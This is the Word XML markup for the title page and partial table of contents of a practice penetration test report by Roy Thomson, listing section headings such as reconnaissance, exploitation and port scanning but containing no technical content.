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54A" w:rsidRDefault="00C6554A" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc321147149"/>
      <w:bookmarkStart w:id="1" w:name="_Toc318188227"/>
      <w:bookmarkStart w:id="2" w:name="_Toc318188327"/>
      <w:bookmarkStart w:id="3" w:name="_Toc318189312"/>
      <w:bookmarkStart w:id="4" w:name="_Toc321147011"/>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRPr="008B5277" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00E572EA" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Practice Pentest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C6554A" w:rsidRPr="00D5413C" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00384C51">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C6554A" w:rsidRDefault="00384C51" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
      <w:r>
        <w:t>Roy Thomson</w:t>
      </w:r>
      <w:r w:rsidR="00C6554A">
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
      <w:r w:rsidR="00C6554A" w:rsidRPr="00D5413C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>05/03/19</w:t>
      </w:r>
      <w:r w:rsidR="00C6554A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1350451751"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00E46162">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc2777717" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777717 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777718" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00E72F18">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules of Engagement</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777718 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777719" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.1  Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777719 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777720" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.2  Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777720 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777721" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="00E72F18">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777721 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777722" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r w:rsidR="00E72F18">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Key Findings</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777722 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777723" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Technical Report</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777723 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777724" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1  Summary</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777724 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777725" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2  Port and service scanning</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777725 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777726" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1  Enumeration</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777726 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
